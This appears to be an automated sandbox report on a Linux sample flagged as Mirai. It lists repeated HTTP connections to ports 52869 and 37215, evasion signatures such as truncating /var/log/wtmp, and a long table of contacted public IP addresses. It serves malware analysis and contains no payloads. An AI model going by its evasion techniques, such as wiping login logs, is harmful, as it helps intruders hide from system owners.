Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34352 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54830 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43062 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 44014 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53002 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46170 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58386 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36834 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 46296 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40198 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53918 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35938 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36094 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50224 -> 52869

Malware Analysis System Evasion:

barindex
Deletes security-related log files
Source: /usr/bin/rm (PID: 5266) Truncated file: /var/log/wtmp Jump to behavior
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pkill (PID: 5278) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5284) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5286) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5410) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5456) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5571) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /usr/bin/whoopsie (PID: 5337) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5410) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5435) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5553) Queries kernel information via 'uname': Jump to behavior
Deletes log files
Source: /usr/bin/rm (PID: 5266) Truncated file: /var/log/wtmp Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5435) Truncated file: /var/log/gpu-manager.log Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5553) Truncated file: /var/log/gpu-manager.log Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality:

barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
59.165.159.36
 unknown India
4755 TATACOMM-ASTATACommunicationsformerlyVSNLisLeadingISP false
156.158.98.14
 unknown Tanzania United Republic of
37133 airtel-tz-asTZ false
126.139.65.215
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
41.102.150.109
 unknown Algeria
36947 ALGTEL-ASDZ false
145.30.21.7
 unknown Netherlands
1103 SURFNET-NLSURFnetTheNetherlandsNL false
197.116.172.19
 unknown Algeria
36947 ALGTEL-ASDZ false
32.81.194.163
 unknown United States
2686 ATGS-MMD-ASUS false
67.241.131.148
 unknown United States
11351 TWC-11351-NORTHEASTUS false
41.57.232.57
 unknown Ghana
37103 BUSYINTERNETGH false
156.246.150.168
 unknown Seychelles
328608 Africa-on-Cloud-ASZA false
156.134.83.77
 unknown United States
12217 UPSUS false
155.167.205.84
 unknown United States
20057 ATT-MOBILITY-LLC-AS20057US false
156.48.59.142
 unknown United Kingdom
29975 VODACOM-ZA false
197.153.12.90
 unknown Morocco
36925 ASMediMA false
198.10.206.121
 unknown United States
24 AS24US false
156.154.241.62
 unknown United States
19905 NEUSTAR-AS6US false
96.205.253.26
 unknown United States
7922 COMCAST-7922US false
216.47.150.26
 unknown United States
29825 IIT-NETWORK-ASUS false
135.222.165.169
 unknown United States
10455 LUCENT-CIOUS false
197.181.96.243
 unknown Kenya
33771 SAFARICOM-LIMITEDKE false
4.131.82.38
 unknown United States
3356 LEVEL3US false
175.106.189.22
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
156.49.135.42
 unknown Sweden
29975 VODACOM-ZA false
132.208.44.133
 unknown Canada
376 RISQ-ASCA false
197.53.167.23
 unknown Egypt
8452 TE-ASTE-ASEG false
201.138.200.133
 unknown Mexico
8151 UninetSAdeCVMX false
41.198.255.152
 unknown South Africa
328306 Avanti-ASZA false
185.188.72.147
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
41.42.142.158
 unknown Egypt
8452 TE-ASTE-ASEG false
156.235.45.185
 unknown Seychelles
134705 ITACE-AS-APItaceInternationalLimitedHK false
80.31.124.83
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
221.160.166.162
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
178.157.234.78
 unknown Denmark
43557 ASEMNETDK false
156.154.241.72
 unknown United States
19905 NEUSTAR-AS6US false
156.22.182.88
 unknown Australia
29975 VODACOM-ZA false
156.235.189.160
 unknown Seychelles
134548 DXTL-HKDXTLTseungKwanOServiceHK false
197.237.113.178
 unknown Kenya
15399 WANANCHI-KE false
157.244.145.111
 unknown Canada
32934 FACEBOOKUS false
156.72.230.178
 unknown United States
29975 VODACOM-ZA false
197.130.137.73
 unknown Morocco
6713 IAM-ASMA false
41.60.37.68
 unknown Mauritius
30969 ZOL-ASGB false
60.25.152.140
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
72.79.77.130
 unknown United States
701 UUNETUS false
197.114.121.159
 unknown Algeria
36947 ALGTEL-ASDZ false
197.143.173.219
 unknown Algeria
36891 ICOSNET-ASDZ false
41.215.59.59
 unknown Kenya
15808 ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKE false
119.189.161.217
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
48.202.227.50
 unknown United States
2686 ATGS-MMD-ASUS false
41.199.209.17
 unknown Egypt
36992 ETISALAT-MISREG false
83.223.101.1
 unknown United Kingdom
29017 GYRONGB false
197.66.206.25
 unknown South Africa
16637 MTNNS-ASZA false
156.197.151.2
 unknown Egypt
8452 TE-ASTE-ASEG false
101.254.64.50
 unknown China
23724 CHINANET-IDC-BJ-APIDCChinaTelecommunicationsCorporation false
156.197.234.78
 unknown Egypt
8452 TE-ASTE-ASEG false
140.178.218.215
 unknown United States
668 DNIC-AS-00668US false
156.147.203.94
 unknown Korea Republic of
4668 LGNET-AS-KRLGCNSKR false
156.230.199.6
 unknown Seychelles
134705 ITACE-AS-APItaceInternationalLimitedHK false
95.107.112.141
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
186.52.71.22
 unknown Uruguay
6057 AdministracionNacionaldeTelecomunicacionesUY false
149.78.207.23
 unknown United States
46356 SBUEDUUS false
94.55.185.136
 unknown Turkey
47524 TURKSAT-ASTR false
158.99.140.160
 unknown Spain
766 REDIRISRedIRISAutonomousSystemES false
197.237.248.156
 unknown Kenya
15399 WANANCHI-KE false
91.84.192.4
 unknown United Kingdom
12513 ECLIPSEGB false
205.133.146.227
 unknown United States
600 OARNET-ASUS false
197.192.154.251
 unknown Egypt
36992 ETISALAT-MISREG false
165.139.176.150
 unknown United States
11686 ENAUS false
171.148.60.101
 unknown United States
9874 STARHUB-MOBILEStarHubLtdSG false
88.144.36.106
 unknown United Kingdom
12708 ONETEL-ASTalkTalkCommunicationsLimitedGB false
197.210.170.3
 unknown Nigeria
29465 VCG-ASNG false
95.231.65.178
 unknown Italy
3269 ASN-IBSNAZIT false
156.215.141.76
 unknown Egypt
8452 TE-ASTE-ASEG false
156.231.181.95
 unknown Seychelles
26484 IKGUL-26484US false
41.202.62.185
 unknown South Africa
25818 CMCNETWORKSZA false
197.131.5.169
 unknown Morocco
6713 IAM-ASMA false
42.116.150.58
 unknown Viet Nam
18403 FPT-AS-APTheCorporationforFinancingPromotingTechnolo false
156.78.164.220
 unknown United States
18862 NCS-HEALTHCAREUS false
197.87.110.25
 unknown South Africa
10474 OPTINETZA false
16.156.166.198
 unknown United States
unknown unknown false
156.203.180.103
 unknown Egypt
8452 TE-ASTE-ASEG false
156.55.39.63
 unknown United States
22146 LANDAMUS false
156.158.25.75
 unknown Tanzania United Republic of
37133 airtel-tz-asTZ false
156.183.78.33
 unknown Egypt
36992 ETISALAT-MISREG false
156.7.184.118
 unknown United States
29975 VODACOM-ZA false
188.19.223.167
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
200.185.26.94
 unknown Brazil
16685 TIVITTERCEIRIZACAODEPROCESSOSSERVETECSABR false
218.245.176.103
 unknown China
4847 CNIX-APChinaNetworksInter-ExchangeCN false
148.115.69.203
 unknown United States
6501 SOUTHERNETUS false
2.202.172.128
 unknown Germany
3209 VODANETInternationalIP-BackboneofVodafoneDE false
74.112.91.25
 unknown Canada
63350 FONCLOUDCA false
197.165.92.222
 unknown Egypt
24863 LINKdotNET-ASEG false
197.86.54.155
 unknown South Africa
10474 OPTINETZA false
156.102.62.18
 unknown United States
393504 XNSTGCA false
98.105.91.27
 unknown United States
6167 CELLCO-PARTUS false
73.161.162.133
 unknown United States
7922 COMCAST-7922US false
41.113.157.210
 unknown South Africa
16637 MTNNS-ASZA false
156.63.125.78
 unknown United States
19902 NET-STATE-OHIOUS false
179.247.28.58
 unknown Brazil
26599 TELEFONICABRASILSABR false
62.150.83.78
 unknown Kuwait
9155 QNETKuwaitKW false
41.4.60.87
 unknown South Africa
29975 VODACOM-ZA false

Contacted Domains

Name IP Active
daisy.ubuntu.com 162.213.33.108 true